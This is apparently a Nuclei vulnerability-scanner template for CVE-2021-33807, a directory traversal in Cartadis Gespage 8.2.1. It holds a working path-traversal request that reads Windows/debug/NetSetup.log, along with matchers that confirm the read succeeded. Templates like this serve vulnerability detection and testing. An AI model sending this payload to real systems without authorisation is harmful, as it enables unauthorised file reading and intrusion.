nuclei-templates/cves/2021/CVE-2021-33807.yaml

34 lines
870 B
YAML

id: CVE-2021-33807
info:
name: Cartadis Gespage 8.2.1 - Directory Traversal
author: daffainfo
severity: high
description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.
reference:
- https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807
tags: cve,cve2021,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"
matchers-condition: and
matchers:
- type: word
words:
- "NetpDoDomainJoin:"
part: body
- type: word
words:
- "application/octet-stream"
part: header
- type: status
status:
- 200